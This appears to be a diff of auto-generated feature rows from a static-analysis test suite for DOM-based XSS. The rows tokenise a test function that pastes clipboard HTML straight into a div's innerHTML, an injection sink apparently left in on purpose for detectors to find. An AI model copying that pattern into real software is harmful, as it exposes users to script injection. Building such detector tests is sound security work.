innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:35:39:35 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:35:39:35 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:35:39:35 | e | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:35:39:35 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:35:39:35 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:13:40:26 | !clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:13:40:26 | !clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:13:40:26 | !clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:13:40:26 | !clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:13:40:26 | !clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:40:14:40:26 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:18 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:18 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:18 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:18 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:18 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text = ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text = ... plain') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text = ... plain') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text = ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:15:42:56 | text = ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:34 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:34 | clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:34 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:34 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:34 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:42 | clipboa ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:42 | clipboa ... getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:42 | clipboa ... getData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:42 | clipboa ... getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:42 | clipboa ... getData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | clipboa ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | clipboa ... plain') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | clipboa ... plain') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | clipboa ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | clipboa ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | exceptional return of clipboa ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | exceptional return of clipboa ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | exceptional return of clipboa ... plain') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | exceptional return of clipboa ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:22:42:56 | exceptional return of clipboa ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:36:42:42 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:36:42:42 | getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:36:42:42 | getData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:36:42:42 | getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:42:36:42:42 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | CalleeFlexibleAccessPath | clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12551,11 +94076,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:42:44:42:55 | 'text/plain' | receiverName | clipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:18 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:18 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:18 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html = ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html = ... /html') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html = ... /html') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html = ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:15:43:55 | html = ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:34 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:34 | clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:34 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:34 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:34 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:42 | clipboa ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:42 | clipboa ... getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:42 | clipboa ... getData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:42 | clipboa ... getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:42 | clipboa ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | clipboa ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | clipboa ... /html') | contextSurroundingFunctionParameters | ()\n(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | clipboa ... /html') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | clipboa ... /html') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | clipboa ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | exceptional return of clipboa ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | exceptional return of clipboa ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | exceptional return of clipboa ... /html') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | exceptional return of clipboa ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:22:43:55 | exceptional return of clipboa ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:36:43:42 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:36:43:42 | getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:36:43:42 | getData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:36:43:42 | getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:43:36:43:42 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | CalleeFlexibleAccessPath | clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12564,6 +94124,121 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:43:44:43:54 | 'text/html' | receiverName | clipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:17 | !text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:17 | !text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:17 | !text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:17 | !text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:17 | !text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:26 | !text && !html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:26 | !text && !html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:26 | !text && !html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:26 | !text && !html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:13:44:26 | !text && !html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:22:44:26 | !html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:22:44:26 | !html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:22:44:26 | !html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:22:44:26 | !html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:22:44:26 | !html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:44:23:44:26 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | e | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:9 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:24 | e.preventDefault | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:24 | e.preventDefault | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:24 | e.preventDefault | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:24 | e.preventDefault | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:24 | e.preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | e.preventDefault() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | e.preventDefault() | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | e.preventDefault() | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | e.preventDefault() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | exceptional return of e.preventDefault() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | exceptional return of e.preventDefault() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | exceptional return of e.preventDefault() | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | exceptional return of e.preventDefault() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:9:46:26 | exceptional return of e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:11:46:24 | preventDefault | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:11:46:24 | preventDefault | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:11:46:24 | preventDefault | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData 